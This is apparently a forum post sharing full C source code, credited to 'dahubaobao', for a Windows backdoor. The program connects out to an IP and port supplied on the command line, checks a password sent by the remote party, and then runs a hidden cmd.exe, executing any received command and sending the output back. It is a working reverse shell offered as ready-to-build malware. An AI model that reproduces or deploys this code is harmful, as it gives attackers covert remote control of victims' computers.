文章作者:dahubaobao[EST]
复制内容到剪贴板
代码:
#include <winsock2.h>
#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!\n"
#define PASSERROR "Password error.\n"
#define BYEBYE "ByeBye!\n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用户设置密码缓冲
TCHAR PassBuf[20]={0}; //接收密码缓冲
TCHAR PassBanner[]="\nPassword:";
TCHAR Banner[]="---------dahubaobao backdoor---------\n";
if (argc!=4)
{
fprintf(stderr,"Code by dahubaobao\n"
"Usage:%s [DestIP] [Port] [Password]\n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
//判断参数合法性,并填充地址结构
//IP地址不能大于15
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
#ifdef DEBUGMSG
printf("Internet address no larger than \"15\"\n");
#endif
goto Clean;
}
//端口不能小于0 && 大于65535
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
#ifdef DEBUGMSG
printf("Port no less than \"0\" and larger than \"65535\"");
#endif
goto Clean;
}
//密码最大16位
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); //复制密码
else
{
#ifdef DEBUGMSG
printf("Please connect password error\n");
#endif
goto Clean;
}
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
#ifdef DEBUGMSG
printf("WSAStartup() error: %d\n",nRet);
#endif
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
#ifdef DEBUGMSG
printf("socket() GetLastError reports %d\n",WSAerron);
#endif
goto Clean;
}
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
#ifdef DEBUGMSG
sprintf(MsgError,"send() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
#ifdef DEBUGMSG
sprintf(MsgError,"send() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
#ifdef DEBUGMSG
send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0);
#endif
ThreadFlag=TRUE;
break;
}
else
{
#ifdef DEBUGMSG
send(sock,PASSERROR,sizeof (PASSERROR),0);
#endif
continue;
}
if (nRet==SOCKET_ERROR)
{
#ifdef DEBUGMSG
sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000);
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="\ndahubaobao:\\>";
while (TRUE)
{
TCHAR MsgError[50]={0}; //错误消息缓冲
TCHAR Cmdline[300]={0}; //命令行缓冲
TCHAR RecvBuf[1024]={0}; //接收缓冲
TCHAR SendBuf[2048]={0}; //发送缓冲
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
#ifdef DEBUGMSG
sprintf(MsgError,"CreatePipe() GetLastError reports %d\n",erron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd
ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符
if (ret==SOCKET_ERROR)
{
#ifdef DEBUGMSG
sprintf(MsgError,"send() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据
//如果为exit或quit,就退出
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
#ifdef DEBUGMSG
send(sock,BYEBYE,sizeof (BYEBYE),0);
#endif
goto Clean;
}
//表示对方已经断开
if (ret==SOCKET_ERROR)
{
#ifdef DEBUGMSG
sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
goto Clean;
}
//表示接收数据出错
if (ret<=0)
{
#ifdef DEBUGMSG
sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
continue;
}
Sleep(100); //休息一下,可要可不要
strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
#ifdef DEBUGMSG
sprintf(MsgError,"CreateProcess() GetLastError reports %d\n",erron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
continue;
}
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); //发送出去
memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零
Sleep(100); //休息一下
}
}
Clean:
//释放句柄
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
//释放SOCKET
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}
